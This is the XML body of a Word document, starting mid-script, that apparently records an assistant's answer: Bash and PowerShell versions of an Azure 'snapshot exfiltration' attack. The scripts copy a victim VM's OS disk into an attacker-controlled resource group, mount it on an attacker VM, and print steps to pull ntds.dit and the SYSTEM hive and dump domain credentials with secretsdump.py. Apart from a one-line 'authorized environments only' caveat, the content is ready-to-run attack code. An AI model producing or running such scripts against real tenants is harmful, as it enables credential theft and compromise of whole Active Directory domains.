        <w:t>ATTACKER_ID=$(az ad signed-in-user show --query id -o tsv)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDC7D9C" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t>SNAPSHOT_SCOPE=$(az snapshot show --name "$SNAPSHOT_NAME" --resource-group "$RESOURCE_GROUP" --query id -o tsv)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CB8CA8" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t>az role assignment create --assignee "$ATTACKER_ID" --role "Reader" --scope "$SNAPSHOT_SCOPE"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DFF1B4" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855"/>
    <w:p w14:paraId="21487D14" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t>echo "[+] Step 4: Create managed disk from snapshot in attacker RG..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F33750" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t>az disk create --name "$DISK_NAME" --resource-group "$ATTACKER_RG" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319DEA1B" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve">  --source "$SNAPSHOT_SCOPE"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122AD2F8" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855"/>
    <w:p w14:paraId="0FEC40AC" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t>echo "[+] Step 5: Create temporary Linux VM (if not already exists)..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7579D262" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t>az vm create --name "$ATTACKER_VM_NAME" --resource-group "$ATTACKER_RG" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D88F9E1" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve">  --image UbuntuLTS --generate-ssh-keys --query publicIpAddress -o tsv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE70560" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855"/>
    <w:p w14:paraId="3BC62F82" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t>echo "[+] Step 6: Attach disk to attacker VM..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D195CFA" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t>az vm disk attach --vm-name "$ATTACKER_VM_NAME" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1110B8FE" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve">  --resource-group "$ATTACKER_RG" --disk "$DISK_NAME"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49959767" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855"/>
    <w:p w14:paraId="0ADE2DED" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t>echo "[*] DONE - SSH into the forensics VM and extract NTDS/SYSTEM:"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089498F8" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t>echo "    ssh azureuser@&lt;public-ip&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BD1A97" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t>echo "    sudo mkdir /mnt/victim"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB1EB0C" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t>echo "    sudo mount /dev/sdc1 /mnt/victim"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1092FD2F" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t>echo "    sudo cp /mnt/victim/Windows/NTDS/ntds.dit ~/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7207B509" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t>echo "    sudo cp /mnt/victim/Windows/System32/config/SYSTEM ~/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB9069E" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t>echo "    sudo chown azureuser:azureuser ~/ntds.dit ~/SYSTEM"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513FA80D" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855"/>
    <w:p w14:paraId="121ECD99" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:lastRenderedPageBreak/>
        <w:t>echo "[*] Then use SFTP to pull files and run:"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C21603" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t>echo "    secretsdump.py -system SYSTEM -ntds ntds.dit LOCAL -outputfile secrets.txt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD34A1B" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r>
        <w:pict w14:anchorId="0053A2EE">
          <v:rect id="_x0000_i1030" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CEBF8F" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Instructions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44978AF2" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Customize</w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:t>: Set RESOURCE_GROUP, VM_NAME, and ATTACKER_RG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BA3006" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Run</w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D0FBF1" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:t>chmod +x azure_shadow_copy.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5E3B5E" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:t>./azure_shadow_copy.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531877DD" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Follow the printed instructions</w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve"> to extract files from the mounted disk.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBB36B8" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r>
        <w:pict w14:anchorId="239E3757">
          <v:rect id="_x0000_i1031" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="652F1E16" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t>Would you like a PowerShell version for Windows-based environments too?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA22BE6" w14:textId="77777777" w:rsidR="00367855" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="777B04B2" w14:textId="77777777" w:rsidR="00367855" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows based PowerShell version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45702151" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve">Here is a </w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PowerShell version</w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve"> of the Azure Shadow Copy (Snapshot Exfiltration) attack script for Windows-based red team operations or Azure pentests:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BAF59E" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>⚠️</w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>For educational use in authorized environments only</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146D9C65" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r>
        <w:pict w14:anchorId="07BDC4E6">
          <v:rect id="_x0000_i1032" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C159B0B" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B73BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Azure-ShadowCopy.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E9D25B" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C37D355" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t>.SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B361D6" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve">  Azure Shadow Copy Snapshot Attack - PowerShell Edition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BD0F41" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855"/>
    <w:p w14:paraId="4FFF1983" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t>.DESCRIPTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08829BD2" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve">  Creates a snapshot of a victim VM’s OS disk and mounts it to an attacker VM for file extraction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A089FA" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve">  Use this to access sensitive files (e.g., NTDS.dit, SYSTEM hive) during Azure post-exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADA089F" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855"/>
    <w:p w14:paraId="29899C92" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t>.REQUIREMENTS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F485A98" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve">  - Azure PowerShell Module (Az)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C82C9F" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve">  - Logged into Azure via `Connect-AzAccount`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B649A77" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve">  - Attacker has necessary disk/snapshot/vm permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D86A4BE" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716ADADF" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855"/>
    <w:p w14:paraId="2B5B92A7" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t># === USER CONFIGURATION ===</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7315CB09" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t>$VictimRG = "VictimResourceGroup"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261B0538" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t>$VictimVM = "TargetVM"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A3ED03" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t>$AttackerRG = "AttackerResourceGroup"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC88AB8" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t>$AttackerVM = "ForensicsVM"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247E8DC9" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t>$SnapshotName = "snap-$VictimVM"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261222CD" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t>$DiskName = "disk-from-$VictimVM"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CDD097" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855"/>
    <w:p w14:paraId="12C7FA97" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t># === STEP 1: Get victim disk ID ===</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE51C25" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t>Write-Host "[+] Getting OS disk ID for victim VM..." -ForegroundColor Cyan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C756E24" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t>$diskId = (Get-AzVM -ResourceGroupName $VictimRG -Name $VictimVM).StorageProfile.OsDisk.ManagedDisk.Id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600F257B" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855"/>
    <w:p w14:paraId="401DC7AF" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t># === STEP 2: Create snapshot ===</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518262E8" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t>Write-Host "[+] Creating snapshot..." -ForegroundColor Cyan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1219526C" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t>$snapshotConfig = New-AzSnapshotConfig -SourceUri $diskId -Location "eastus" -CreateOption Copy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707BC18A" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t>New-AzSnapshot -Snapshot $snapshotConfig -SnapshotName $SnapshotName -ResourceGroupName $VictimRG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BCAFD6" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855"/>
    <w:p w14:paraId="1FB28361" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t># === STEP 3: Create disk from snapshot ===</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E66E387" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t>Write-Host "[+] Creating new managed disk from snapshot in attacker RG..." -ForegroundColor Cyan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3369DD" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t>$snap = Get-AzSnapshot -ResourceGroupName $VictimRG -SnapshotName $SnapshotName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B71297E" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t>$diskConfig = New-AzDiskConfig -AccountType StandardSSD_LRS -Location $snap.Location `</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5170F6" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve">    -CreateOption Copy -SourceResourceId $snap.Id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42674AF5" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t>New-AzDisk -DiskName $DiskName -Disk $diskConfig -ResourceGroupName $AttackerRG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB37EAF" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855"/>
    <w:p w14:paraId="740FC5B4" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t># === STEP 4: Attach disk to attacker's forensics VM ===</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C208B32" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t>Write-Host "[+] Attaching disk to attacker VM..." -ForegroundColor Cyan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2788B9EF" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:lastRenderedPageBreak/>
        <w:t>$vm = Get-AzVM -Name $AttackerVM -ResourceGroupName $AttackerRG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4351C537" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t>Add-AzVMDataDisk -VM $vm -Name $DiskName -CreateOption Attach -ManagedDiskId `</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33079C15" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t xml:space="preserve">    (Get-AzDisk -ResourceGroupName $AttackerRG -DiskName $DiskName).Id -Lun 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FBA7F2" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t>Update-AzVM -ResourceGroupName $AttackerRG -VM $vm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6266D258" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855"/>
    <w:p w14:paraId="1DA0553C" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t># === DONE ===</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF29B6A" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t>Write-Host "[*] DONE. SSH into the forensics VM, mount, and extract NTDS/SYSTEM files." -ForegroundColor Green</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38410953" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t>Write-Host "Example:"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320F8A7F" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t>Write-Host "  sudo mkdir /mnt/victim"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1940FFB5" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t>Write-Host "  sudo mount /dev/sdc1 /mnt/victim"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9E86DC" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t>Write-Host "  sudo cp /mnt/victim/Windows/NTDS/ntds.dit ~/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A8AA64" w14:textId="77777777" w:rsidR="00367855" w:rsidRPr="002B73BB" w:rsidRDefault="00367855" w:rsidP="00367855">
      <w:r w:rsidRPr="002B73BB">
        <w:t>Write-Host "  sudo cp /mnt/victim/Windows/System32/config/SYSTEM ~/"</w:t>
      </w:r>
    </w:p>
